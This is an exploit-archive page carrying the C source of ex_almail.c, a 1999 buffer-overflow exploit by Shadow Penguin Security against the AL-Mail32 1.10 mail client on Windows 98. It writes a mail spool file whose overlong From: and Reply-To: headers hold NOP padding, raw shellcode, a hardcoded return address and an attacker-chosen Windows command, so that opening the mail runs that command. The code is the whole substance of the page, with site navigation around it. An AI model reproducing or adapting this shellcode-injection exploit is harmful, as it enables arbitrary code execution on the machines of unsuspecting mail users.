ex_almail.c

ex_almail.c: Posted Nov 5, 1999; Authored by shadowpenguin; We found the overflow bug of AL-Mail32 Ver1.10. It overflows when that receives the long message of From: or Reply-To:. If the POP3 server send the long reply message that contains the exploit code, client executes any code. This exploit code execute any command on the target windows.; tags | exploit, overflow; systems | windows; SHA-256 | 707e8900f91b20b7c4ce906c63a00e36b79aa06a48654a492b594792e64b7447; Download | Favorite | View

ex_almail.c

/*=============================================================================
   AL-Mail32 Version 1.10 Exploit for Windows98
   The Shadow Penguin Security (http://shadowpenguin.backsection.net)
   Written by UNYUN (shadowpenguin@backsection.net)
  =============================================================================
*/

#include    <stdio.h>
#include    <string.h>

#define HEADER1 \
"From hehehe@hohoho.com Sat Jul 32 25:01 JST 1999\n"\
"Message-ID: <001_The_ShadowPenguinSecurity_@rockhopper>\n"

#define HEADER2 \
"Content-Transfer-Encoding: 7bit\n"\
"X-Mailer: PenguinMailer Ver1.01\n"\
"Content-Type: text/plain; charset=US-ASCII\n"\
"Content-Length: 6\n"\
"\n"\
"hehe\n"

#define RETADR          260
#define JMPADR          256
#define JMPOFS          6
#define JMP_EBX_ADR     0xbff7a06b
#define CMDLENP         0x43
#define BUFEND          5000

#define FUNC            "msvcrt.dll.system.exit."

#define JMPS            0xeb
#define NOP             0x90

unsigned char exploit_code[200]={
 0xEB,0x4D,0x5B,0x53,0x32,0xE4,0x83,0xC3,0x0B,0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7,
 0xBF,0xFF,0xD0,0x8B,0xD0,0x52,0x43,0x53,0x52,0x32,0xE4,0x83,0xC3,0x06,0x88,0x23,
 0xB8,0x27,0x6E,0xF7,0xBF,0x40,0xFF,0xD0,0x8B,0xF0,0x5A,0x43,0x53,0x52,0x32,0xE4,
 0x83,0xC3,0x04,0x88,0x23,0xB8,0x27,0x6E,0xF7,0xBF,0x40,0xFF,0xD0,0x8B,0xF8,0x43,
 0x53,0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,0xD6,0x33,0xC0,0x50,0xFF,0xD7,0xE8,
 0xAE,0xFF,0xFF,0xFF,0x00
};

main(int argc,char *argv[])
{
    FILE        *fp;
    static char buf[10000];
    int         i,r,ip;

    if (argc!=3){
        printf("usage : %s MailSpoolDirectry WindowsCommand\n",argv[0]);
        exit(1);
    }
    
    if ((fp=fopen(argv[1],"wb"))==NULL){
        printf("Permittion denied :-P\n");
        exit(1);
    }   
    fwrite(HEADER1,1,strlen(HEADER1),fp);

    memset(buf,NOP,BUFEND);
    strcat(exploit_code,FUNC);
    strcat(exploit_code,argv[2]);
    exploit_code[CMDLENP]=strlen(argv[2]);
    strncpy(buf+RETADR+4,exploit_code,strlen(exploit_code));

    ip=JMP_EBX_ADR;
    buf[JMPADR]  =0xeb;
    buf[JMPADR+1]=0x06;
    buf[RETADR+3]=0xff&(ip>>24);
    buf[RETADR+2]=0xff&(ip>>16);
    buf[RETADR+1]=0xff&(ip>>8);
    buf[RETADR]  =ip&0xff;
    buf[BUFEND]  =0;

    fprintf(fp,"Reply-To: \"%s\" <hehehe@hohoho.com>\n",buf);
    fprintf(fp,"From: \"%s\" <hehehe@hohoho.com>\n",buf);

    fwrite(HEADER2,1,strlen(HEADER2),fp);
    fclose(fp);
}

Top Authors In Last 30 Days

Red Hat 228 files
Ubuntu 55 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Google Security Research 6 files
Apple 6 files
Milad Karimi 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,333)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,578)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,460)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

ex_almail.c

ex_almail.c

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

ex_almail.c

Share This

ex_almail.c

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems